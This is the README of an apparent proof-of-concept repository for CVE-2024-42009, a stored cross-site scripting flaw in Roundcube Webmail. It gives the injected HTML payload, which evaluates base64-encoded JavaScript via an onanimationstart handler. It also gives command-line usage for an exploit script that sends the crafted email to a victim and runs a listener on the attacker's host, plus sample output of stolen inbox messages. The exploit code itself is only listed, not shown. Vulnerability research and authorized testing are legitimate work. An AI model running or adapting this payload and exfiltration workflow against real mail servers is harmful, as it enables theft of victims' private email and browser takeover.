CVE-2024-42009 Proof of Concept# CVE-2024-42009 PoC: Email Capture Listener & XSS Exploit in Roundcube Webmail
## Overview
This repository contains a proof-of-concept (PoC) exploit for **CVE-2024-42009** a stored Cross-Site Scripting (XSS) vulnerability in Roundcube Webmail version 1.6.7 and other several versions. The exploit demonstrates how an attacker can inject malicious JavaScript in a message and take advantage of a desanitization issue when parsing the HTML inside the message, which then can be used to exfiltrate email content from the victim's inbox in this example or even take over the browser of the victim.
## Vulnerability Details
### CVE Description
A Cross-Site Scripting vulnerability in Roundcube through 1.5.7 and 1.6.x through 1.6.7 allows a remote attacker to steal and send emails of a victim via a crafted e-mail message that abuses a Desanitization issue in message_body() in program/actions/mail/show.php.
### XSS Payload Explanation (for this example)
The exploit uses a CSS animation trigger for XSS execution:
```html
<body title="bgcolor=foo" name="bar style=animation-name:progress-bar-stripes onanimationstart=eval(atob('BASE64_PAYLOAD')) foo=bar>
```
The body gets parsed as a div, and then we need to adapt to it, so that's why we use the `onanimationstart` attribute to call the eval function and execute complex JavaScript calls from it. To further read on how the exploit works and where the vulnerabilities are in roundcube, read [this article](https://www.sonarsource.com/blog/government-emails-at-risk-critical-cross-site-scripting-vulnerability-in-roundcube-webmail/#desanitization-in-inline-email-rendering-cve202442009).
### Scope
- This exploit was tested only on Roundcube Webmail version 1.6.7
- Victim must open the the message to see its contents
- May fail if Content Security Policy (CSP) is properly configured
## Usage
### Dependencies
Install required Python packages:
```bash
python3 -m venv venv
python3 -m pip install -r requirements
```
### Command Line Arguments
```bash
python3 exploit.py -u <TARGET_URL> -r <RECIPIENT_EMAIL> -l <LISTENER_HOST> -p <LISTENER_PORT>
```
- **Target URL**: In this case we are using the contact form endpoint which handles messages and then forwards them (e.g., `http://email.company.local/contact`)
- **Recipient email**: Valid email address that will receive the malicious message
- **Listener host**: Your box's IP address accessible from the target
- **Listener port**: Available port for the HTTP server (e.g., 4444)
### Example Usage
```bash
python3 exploit.py -u http://webmail.target.com/contact -r admin@target.com -l 192.168.1.100 -p 4444
```
### Expected Output
```
[*] Crafting payload for http://webmail.target.com/contact with recipient admin@target.com
[*] Sending payload to http://webmail.target.com/contact with recipient admin@target.com
[*] Starting HTTP server on port 4444
[+] HTTP server listening on port 4444
[*] Waiting for emails... (Press Ctrl+C to stop manually)
[+] Received 3 emails!
------------------------------------------------------------
📧 EMAIL UID: 1
------------------------------------------------------------
From: john.doe@company.com
Subject: Quarterly Report
Message:
Please find attached the quarterly financial report...
------------------------------------------------------------
[+] Email exfiltration complete! Shutting down server...
[+] Server stopped successfully!
```
## References
### Vulnerability Research
- [SonarSource Blog: Government Emails at Risk - Critical Cross-Site Scripting Vulnerability in Roundcube Webmail](https://www.sonarsource.com/blog/government-emails-at-risk-critical-cross-site-scripting-vulnerability-in-roundcube-webmail/)
- [SonarSource Demonstration Video](https://www.youtube.com/watch?v=X7UX7b7Tkrk)
## Legal Disclaimer
⚠️ **IMPORTANT**: This proof-of-concept is provided for **educational and authorized testing purposes only**. Use it responsibly and this account is not responsible for any damage done by others.
[4.0K] /data/pocs/09b8748d9f5a72166abb5497df528382386477f9
├── [9.1K] exploit.py
├── [3.9K] README.md
└── [ 605] requirements.txt
0 directories, 3 files